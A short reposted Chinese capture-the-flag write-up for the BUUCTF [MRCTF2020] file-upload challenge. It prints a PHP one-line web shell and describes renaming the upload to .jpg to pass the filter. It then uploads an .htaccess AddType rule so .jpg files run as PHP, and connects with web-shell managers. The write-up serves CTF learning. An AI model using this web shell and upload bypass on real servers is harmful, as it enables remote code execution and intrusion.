BUU [MRCTF2020]你傳你🐎呢

本文轉載自查看原文 2020-04-24 15:17 1756 BUU部分刷題記錄

打開題目是一道傳馬的題，那就傳~

<?php @eval($_POST['cmd']) ?>

上傳文件1.php,傳一句話木馬，發現失敗了，抓包時改包后綴名為.jpg,上傳成功！

需要注意的是，這里的原來的.php無法被解析，需要把再上傳一個文件.htaccess文件，將.jpg解析成.php

再次上傳文件1.htaccess

AddType application/x-httpd-php .jpg

菜刀/蟻劍連接即可

(兩次上傳順序都試了下，應該都可以)

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 buu [MRCTF2020]keyboard [MRCTF2020] babyRSA [MRCTF2020]你傳你馬呢 [MRCTF2020]你傳你🐎呢 1 [MRCTF2020]Ezaudit [MRCTF2020]PYWebsite [MRCTF2020]異或 [MRCTF2020]Ezpop 【Buuctf】[MRCTF2020]你傳你🐎呢 WriteUp MRCTF2020 套娃